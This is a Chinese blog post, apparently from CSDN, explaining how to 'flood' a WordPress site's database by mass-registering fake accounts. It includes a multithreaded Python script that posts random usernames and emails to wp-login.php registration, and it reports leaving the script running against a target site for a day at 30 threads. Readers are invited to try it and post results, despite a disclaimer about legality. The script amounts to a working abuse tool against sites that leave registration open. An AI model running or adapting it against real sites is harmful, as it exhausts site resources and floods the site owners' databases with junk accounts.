如何刷爆wordpress的数据库

最新推荐文章于 2023-09-21 13:29:23 发布
最新推荐文章于 2023-09-21 13:29:23 发布
阅读量831 收藏
点赞数
分类专栏: Linux Python 爬虫 文章标签: wordpress 破解 漏洞 数据 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xujiahui320582/article/details/78817226
版权
Python 同时被 3 个专栏收录
7 篇文章 0 订阅
订阅专栏
Linux
4 篇文章 0 订阅
订阅专栏
爬虫
2 篇文章 0 订阅
订阅专栏

本文来源地址:https://blog.oliverxu.cn

 

用过wordpress建站程序的朋友应该都知道,建的站点可以接受人们的注册,而某些站点往往做的比较垃圾,不设置什么验证,本文的思路就是基于此漏洞,以后会教大家如何识别网站可能弹出的验证码。

本文的目的在于揭示这个漏洞,并教那些和我一样的小白站长一定要注意网站的安全问题,因为数据是最重要的。本文并不是教大家如何去攻击,请大家遵守法律!!!

测试效果(最新更新)

下图是我这个程序将线程开到30,跑了一天后,目标网站的博主发的,仅供参考。

目的

利用python编写脚本来批量注册使用wordpress搭建的用户,来刷爆目标站点的数据库,注意,网站一定要开启注册才能使用本教程的方法。

如果你的wordpress站点如下图开启了注册功能,并没有验证码之类的东西,那就请继续看下去,我会在以后的文章中更新有验证码的情况下的解决办法:

分析

1.打开浏览器F12分析网页数据

2.在注册页面输入注册信息

3.点击注册按钮,并观察网页请求

4.分析网页请求的请求头和参数:

编写程序

# coding:utf-8 -*-
# coding:utf-8 -*-
import random
import requests
import threading
import random

threads = []
thread_num = 2

def zhuce():
	url = "https://www.xujh.top/wp-login.php?action=register"
	UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"

	header = { "User-Agent" : UA
	           }
	 
	wp_session = requests.Session()
	f = wp_session.get(url,headers=header)
	#print f.text

	user = str(random.randint(0,999999999999))
	email = user + '@qq.com'
	postData = { 'user_login': user,
	             'user_email': email,
	             'password': '123123123',
	             'repeat_password': '123123123',
	             'are_you_human': '我是傻逼',
	             'redirect_to': '',
	             'wp-submit': '注册'
	             }
	 
	wp_session.post(url,
	                  data = postData,
	                  headers = header)
	 
	f = wp_session.get('https://www.xujh.top/wp-login.php?checkemail=registered',headers=header)

	with open('log.txt', 'a+') as f:
		f.write(user)
		f.write('\n')



def start():
	for i in xrange(thread_num):
		thread = threading.Thread(target=zhuce, args=())
		threads.append(thread) 

	for t in threads:
		t.start()
		while True:
			if (len(threading.enumerate()) < thread_num): 
				break


start()

程序分析:

此程序是我用我的博客为例子,大家如果照抄运行的话肯定是不行的,具体的博客请具体分析网页的数据,方法已经在此文章中给出,程序哪里不会的请在下方留言,或者加群交流。

程序效果

此程序现在还在我的一台非常垃圾的vps上运行中,截至发文章时,一共批量注册了1570个用户,具体攻击效果以后更新,如果各位水友测试成功了可以在下方留言哦!

 

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
WordPress 数据库批量替换插件
10-25
WordPress 数据库批量替换插件正式发布、一键换域名工具。 如何快速完美的更换WordPress网站域名?使用云存储后如何批量修改老文章的数据? 网站安装证书后,如何把域名完美的由http改为https?想要批量快速的修改...
手把手教你入侵网站修改数据_一天之内建好个人网站,手把手教你全过程
weixin_39575212的博客
11-10 1万+
建个网站一年多少钱?如何自己搭建一个个人网站? 如何逐步构建一个优秀的外贸网站? 如果你有这些问题,那你看完我写的这次实际建站的过程,你就应该全明白了。首先看一下实际的费用。我在阿里云申请的域名http://www.tianjiju.com和主机,费用总共是261元每年。因为我用的是wordpress免费模板,所以没有后续的其他费用。如果新手需要用一个付费模板,那么可能还要再加几十美金的模板费用。...
wordpress数据字典
incloud_anke的博客
12-30 2847
1.wordpress数据字典: 1.wp_categories: 用于保存分类相关信息的表。包括了5个字段,分别是: cat_ID – 每个分类唯一的ID号,为一个bigint(20)值,且带有附加属性auto_increment。 cat_name – 某个分类的名称,为一个varchar(55)值。 category_nic
WordPress主题开发(二)之——数据库及各表结构详解
weixin_38912950的博客
09-21 1103
深入了解WordPress数据库结构和各表的作用对于WordPress开发者至关重要。这将帮助您更好地理解和利用WordPress数据存储能力,以创建功能强大的插件和主题。通过使用适当的SQL查询,您可以与WordPress数据库进行交互,实现各种定制化的功能和特性。因此,在开发WordPress网站时,务必熟悉这些数据库表和列的结构,以便更好地利用WordPress的强大功能。
WordPress 数据库表名及字段详解
Android、HTML、CSS、JS、JAVA、Kotlin、PHP等技术
04-26 3324
最新wordpress数据库表有十二张: wp_commentmeta:存储评论的元数据 wp_comments:存储评论 wp_links:存储友情链接(Blogroll) wp_options:存储WordPress系统选项和插件、主题配置全局设置信息 wp_postmeta:存储文章(包括页面、上传文件、修订)的元数据 wp_posts:存储文章(包括页面、上传文件、修订) wp_t...
您需要了解的WordPress漏洞以及如何修复它们
cumi7754的博客
08-04 961
by Joel S. Syder 乔尔·赛德(Joel S.Syder) 您需要了解的WordPress漏洞以及如何修复它们 (WordPress vulnerabilities you need to know about — and how to fix them) WordPress is an incredibly useful and versatile platform for a...
WordPress架构用户密码破解方法---Kali篇
一杯咖啡的渗透记忆
12-28 5227
首先这次是一个测试版本,没有在正式环境下运行,可以做为WordPress的一个渗透参考: 1. 在虚拟机上面搭建 WordPress机器。    WordPress Linux版的镜像下载地址:https://www.turnkeylinux.org/wordpress    选择镜像如下: 下载到本地,然后镜像安装,安装过程都选择默认的就可以了,最后会得到下面这个界面:   ...
wordpress密码的破解
weixin_33994429的博客
01-29 4698
出處:http://blog.csdn.net/yiyefangzhou24/article/details/8727946wordpress这种CMS国外用的非常多,安全性还是不错的,跟新快,看到这种东西,除了管理员架好之后就托管的垃圾站,持续更新的wordpress还是很让人头疼的。如果通过某种方法拿下了webshell,***之后会发现wp_user这个wordpres...
Wordpress改SqLite数据库操作
10-16
Wordpress改SqLite数据库操作。解决服务器放多个WP站数据库资源占用过大问题。内附一些插件,及具体操作办法
优化WordPress数据库提升网站运行速度
09-28
主要介绍了优化WordPress数据库提升网站运行速度 ,需要的朋友可以参考下
wordpress数据库优化和清理冗余数据的方法
09-29
本文主要介绍了wordpress数据库优化和清理冗余数据的方法,大家参考使用吧
输出WordPress数据库查询的具体内容 减少数据库查询次数
01-20
在 footer.php 里添加了如下代码,以显示wordpress查询数据库次数及查询耗时: <?php echo get_num_queries() . ‘ queries in ‘ . timer_stop(0) . ‘ seconds.’; ?> 结果显示首页查询30次,日志页查询达...
wordpresswordpress后台防暴力破解
学习永不晚
03-10 2322
使用wordpress以后比较关注wordpress安全性,经过了解发现,其实wp还是比较安全的,除了部分插件导致的注入、跨站、文件上传等问题外,本身没有太大问题,最主要的问题就是后台可以进行暴力破解,找了一下没有发现有设置验证码的地方,那么针对后台这一块的防护就比较薄弱了。 那么如何加固我们的后台呢? 经过查找发现,只要在主题的functions.php中加入如下代码即可: ad...
【WEB】Wpscan破解WordPress
HAPPY
08-18 1611
【原题】 https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 【解法】 1.首先用WPCSAN -u url -ap扫描所有 插件漏洞,发现 存在comment-rating漏洞 2.百度这个 漏洞,然后用sqlmap出有关comment-rating的网址的管理员密码(需要MD5解密)...
WordPress默认数据库中的12个数据
程序人生
01-29 853
WordPress默认数据库中的12个数据
用Python爬取WordPress官网所有插件
weixin_34032792的博客
03-07 368
转自丘壑博客 转载注明出处前言只要是用WordPress的人或多或少都会装几个插件,可以用来丰富扩展WordPress的各种功能。围绕WordPress平台的插件和主题已经建立了一个独特的经济生态圈和开发者社区,养活了众多的WordPress相关的开发公司和开发者。各种强大的WordPress插件也层出不穷,有的甚至可以做出功能完善的网站,比如招聘网站、分类信息网站、电商网站、点评网站、培训网站等...
最新WordPress漏洞,黑客可轻松控制您的网站
weixin_30343157的博客
06-28 1408
  近日,我们收到了关于WordPress核心中一个未修补漏洞的提示,该漏洞可能允许低特权用户劫持整个网站并在服务器上执行任意代码,这个最新WordPress漏洞,黑客可轻松控制您的网站。由研究人员发现,7个月前向WordPress安全团队报告了“已认证的任意文件删除”漏洞,但仍未修复,并影响到所有版本的WordPress,包括当前的4.9.6。该漏洞存在于用户永久删除上传图像的缩略图时在后台运行...
WordPress数据库及各表结构
热门推荐
HANK-M的专栏
04-04 5万+
<br />WordPress使用MySQL数据库。作为一个开发者,我们有必要掌握WordPress数据库的基本构造,并在自己的插件或主题中使用他们。<br />截至WordPress3.0,WordPress一共有以下11个表。这里加上了默认的表前缀 wp_ 。<br />wp_commentmeta:存储评论的元数据<br />wp_comments:存储评论<br />wp_links:存储友情链接(Blogroll)<br />wp_options:存储WordPress系统选项和插件、主题配置<b
Python从入门到精通
oliverxu.cn
12-15 1万+
https://blog.oliverxu.cn 最近网上一组消息了朋友圈,那就是Python即将纳入全国计算机等级考试和某些地区的高考。 下图来自全国计算机等级考试的官网,本文将给您介绍Python,并提供从入门到精通的学习路径供参考。 Python简单介绍 Python 是一个高层次的结合了解释性、编译性、互动性和面向对象的脚本语言。 Python 的设计具有很强的可读性,相...
创建wordpress数据库
最新发布
03-28
创建WordPress数据库的步骤如下: 1. 登录到你的MySQL数据库管理工具(如phpMyAdmin)或使用命令行工具(如MySQL Shell)。 2. 创建一个新的数据库,可以使用以下命令: ``` CREATE DATABASE database_name; ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值